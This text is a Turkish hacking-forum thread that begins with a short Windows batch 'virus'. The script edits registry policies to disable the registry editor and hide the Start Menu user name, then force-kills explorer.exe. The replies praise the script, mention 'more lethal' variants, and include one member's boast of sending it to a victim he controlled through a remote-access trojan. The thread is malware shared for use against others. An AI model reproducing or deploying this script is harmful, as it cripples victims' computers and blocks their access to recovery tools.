set lol=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Set val=NoUserNameInStartMenu
Set date=1
reg.exe add "%lol%" /v "%val%" /d "%date%" /f >nul
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t
REG_DWORD/d 1/f > nul
@echo off
TASKKILL /F /IM EXPLORER.EXE
Konu RaxiD tarafından (03-01-2013 22:45 Saat 22:45 ) değiştirilmiştir.
mehmet0054, faddy Teşekkür etti.

01-01-2013 14:35
#2
Sizsiz1 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
09/2012
Nereden:
Win32
Mesajlar:
2.025
Teşekkür (Etti):
7
Teşekkür (Aldı):
247
Konular:
151
saolasın daha ölümcülleride var ama
FFOut HACKER Teşekkür etti.
01-01-2013 14:48
#3
crazygenc - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2012
Nereden:
aDaNa
Mesajlar:
996
Teşekkür (Etti):
69
Teşekkür (Aldı):
113
Konular:
103
emek vermişsin ellerine saglık
Kullanıcı İmzası
BAna tAkılL hAyAtın rEnklEnsin fAzlA tAkılmA gÖk kUşAğınA dÖnerSiN...
FFOut HACKER Teşekkür etti.
01-01-2013 16:41
#4
STooP - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2010
Mesajlar:
117
Teşekkür (Etti):
12
Teşekkür (Aldı):
56
Konular:
41
Güzell .
Bismill2, FFOut HACKER Teşekkür etti.
01-01-2013 16:49
#5
BeFa* - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
01/2012
Nereden:
127.0.0.1
Mesajlar:
1.225
Teşekkür (Etti):
457
Teşekkür (Aldı):
430
Konular:
66
Darkcoment de Kurbanlarımdan Teki Anladı Bana Küfür Etti Baya Bi Ana Bacı Pc'mi Çökertemezsin Dedi Bunu Hazırlayıp Yolladım Pc'si Çöktü Galiba Dahada Girmedi
FFOut HACKER Teşekkür etti.
03-01-2013 19:50
#6
Üyelik tarihi:
09/2012
Nereden:
Sakarya
Yaş:
22
Mesajlar:
202
Teşekkür (Etti):
105
Teşekkür (Aldı):
31
Konular:
53
Alıntı:
xxbefaxx´isimli üyeden Alıntı Mesajı göster
Darkcoment de Kurbanlarımdan Teki Anladı Bana Küfür Etti Baya Bi Ana Bacı Pc'mi Çökertemezsin Dedi Bunu Hazırlayıp Yolladım Pc'si Çöktü Galiba Dahada Girmedi
benim yazdığım virüs kodlarımımı gönderdin
03-01-2013 19:56
#7
Üyelik tarihi:
12/2012
Mesajlar:
185
Teşekkür (Etti):
32
Teşekkür (Aldı):
10
Konular:
7
güzel çalışma devamını beklerim bat gerçekten eğlenceli bir sistemdir
Kullanıcı İmzası
"Köpeklerin efendileri; kurd'un Allah'ı vardır"
FFOut HACKER Teşekkür etti.
04-01-2013 14:50
#8
bigbox - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2011
Nereden:
Azeri/Baki
Yaş:
27
Mesajlar:
3.233
Teşekkür (Etti):
77
Teşekkür (Aldı):
410
Konular:
277
Bilgisayar bu kodu satir-satir okuyor o zaman kod tamamlanmamis olucek......

FFOut HACKER Teşekkür etti.
04-01-2013 19:00
#9
Marwins - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2012
Nereden:
Ankara
Mesajlar:
3.141
Teşekkür (Etti):
2246
Teşekkür (Aldı):
775
Konular:
431
Teşekkürler ama daha etkilileri bulunmakta öyle ki bazıları pcyi çökerttiği gibi hiç bir şekilde açtırmıyor da .Tabi bu virüs Anonymous'ta var.Onun dışında da daha etkilileri var ama bu sadece onların arasından birisi...
FFOut HACKER Teşekkür etti.
06-01-2013 22:26
#10
hajking - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
01/2012
Nereden:
İstanbul
Yaş:
22
Mesajlar:
774
Teşekkür (Etti):
7
Teşekkür (Aldı):
95
Konular:
26
kendin hazırladında bakalım kodların anlamlarını biliyomusun ki
FFOut HACKER Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı